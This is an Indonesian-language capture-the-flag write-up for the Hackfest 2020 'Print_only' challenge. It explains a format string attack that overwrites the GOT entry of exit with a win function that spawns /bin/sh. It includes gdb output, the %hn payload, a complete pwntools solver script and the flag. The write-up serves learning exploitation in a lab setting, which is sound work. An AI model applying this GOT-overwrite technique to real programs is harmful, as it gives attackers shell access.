# Print_only

## Deskripsi

    basic format string attack

## Solusi

Pada challenge ini peserta di tuntut untuk melakukan eksploitasi terhadap 
celah format string, pada celah format string kita dapat melakukan leak,
hingga write pada alamat di dalam memory, pertama kita harus melakukan 
pencarian offset input kita dengan menggunakan %p, contoh input:

    AAAAAAAA %p %p %p %p %p %p %p %p

output program ketika kita menginput data tersebut

    AAAAAAAA 0x7f89c651aa03 (nil) 0x7f89c643ffb2 0x7fff6768ca40 (nil) 0x4141414141414141 0x2520702520702520 0x2070252070252070

dapat terlihat `0x4141414141414141` berada pada posisi `6` berarti sekarang kita telah 
mengetahui letak posisi input kita, selanjutnya jalankan program dengan menggunakan gdb
dengan perintah `gdb -q ./chall` lalu gunakan perintah `info function` untuk melihat 
fungsi yang ada pada binary tersebut

    gef➤  info function
    All defined functions:

    Non-debugging symbols:
    0x0000000000401000  _init
    0x0000000000401080  system@plt
    0x0000000000401090  printf@plt
    0x00000000004010a0  fgets@plt
    0x00000000004010b0  setvbuf@plt
    0x00000000004010c0  exit@plt
    0x00000000004010d0  _start
    0x0000000000401100  _dl_relocate_static_pie
    0x0000000000401110  deregister_tm_clones
    0x0000000000401140  register_tm_clones
    0x0000000000401180  __do_global_dtors_aux
    0x00000000004011b0  frame_dummy
    0x00000000004011b6  init
    0x00000000004011fd  main
    0x000000000040125e  win
    0x0000000000401280  __libc_csu_init
    0x00000000004012f0  __libc_csu_fini
    0x00000000004012f8  _fini

terlihat adanya function `win`, selanjutnya periksa function win dengan menggunakan perintah 
`disas win`

    gef➤  disas win
    Dump of assembler code for function win:
        0x000000000040125e <+0>:     endbr64 
        0x0000000000401262 <+4>:     push   rbp
        0x0000000000401263 <+5>:     mov    rbp,rsp
        0x0000000000401266 <+8>:     lea    rdi,[rip+0xd97]        # 0x402004
        0x000000000040126d <+15>:    call   0x401080 <system@plt>
        0x0000000000401272 <+20>:    nop
        0x0000000000401273 <+21>:    pop    rbp
        0x0000000000401274 <+22>:    ret    
    End of assembler dump.

terlihat function tersebut memanggil function system@plt, lalu coba cek value pada alamat
memory `0x402004` dengan menggunakan perintah `x/s 0x402004` 

    gef➤  x/s 0x402004
    0x402004:       "/bin/sh"

terlihat adanya string `/bin/sh` yang dapat memberikan kita `shell`, sekarang coba cek 
protection pada binary dengan menggunakan perintah `checksec`

    gef➤  checksec
    [+] checksec for '/home/tripoloski/code/ctf/hackfest-2020/quals/pwn/print_only/release/chall'
    Canary                        : ✘ 
    NX                            : ✓ 
    PIE                           : ✘ 
    Fortify                       : ✘ 
    RelRO                         : ✘ 

terlihat protection `relro` tidak aktif, penjelasan mengenai relro dapat dilihat [disini](https://ctf101.org/binary-exploitation/relocation-read-only/), dari sini untuk mendapatkan flag kita 
perlu melakukan `GOT Overwrite` terhadap function `exit`, dimana kita dapat merubahnya menjadi 
function `win` jadi untuk melakukan write ke alamat Got exit, kita dapat menuliskan payload
kita seperti ini:

    p = "%{}c%8$hn".format(win & 0xffff)
    p += "AAAAA"
    p += p64(exit)

pada payload di atas kita mencoba melakukan write `win` ke `exit` , `%{}c` berfungsi untuk mengambil hasil dari `win & 0xffff` yang berarti nilainya adalah 2 byte dari total value `win` misal total 
value win adalah `0xdeadbeef` maka `0xdeadbeef & 0xffff` adalah `0xbeef`atau `48879` lalu 
`%8$hn`, dimana `8` adalah posisi alamat dari `exit` di payload kita yakni `p64(exit)` lalu `hn`
adalah cara kita melakukan write sebanyak 2 byte, untuk informasi lebih lanjut tentang write 
pada format string bisa kalian lihat [disini](https://en.wikipedia.org/wiki/Printf_format_string)
berikut adalah solver saya untuk menyelesaikan soal ini 

    #!/usr/bin/env python2
    import sys
    from pwn import *
    context.update(arch="amd64", endian="little", os="linux", log_level="debug",
                terminal=["tmux", "split-window", "-v", "-p 85"],)
    LOCAL, REMOTE = False, False
    TARGET=os.path.realpath("/home/tripoloski/code/ctf/hackfest-2020/quals/pwn/format-string-attack/chall")
    elf = ELF(TARGET)

    def attach(r):
        if LOCAL:
            bkps = []
            gdb.attach(r, '\n'.join(["break %s"%(x,) for x in bkps]))
        return

    def exploit(r):
        attach(r)

        off = 6
        exit = 0x4033c8
        win = 0x40125e
        p = "%{}c%8$hn".format(win & 0xffff)
        p += "AAAAA"
        p += p64(exit)
        
        r.sendline(p)

        r.interactive()
        return

    if __name__ == "__main__":
        if len(sys.argv)==2 and sys.argv[1]=="remote":
            REMOTE = True
            r = remote("127.0.0.1", 1337)
        else:
            LOCAL = True
            r = process([TARGET,])
        exploit(r)
        sys.exit(0)

FLAG: hackfest{f0rm4t_str1ng_-__-__----}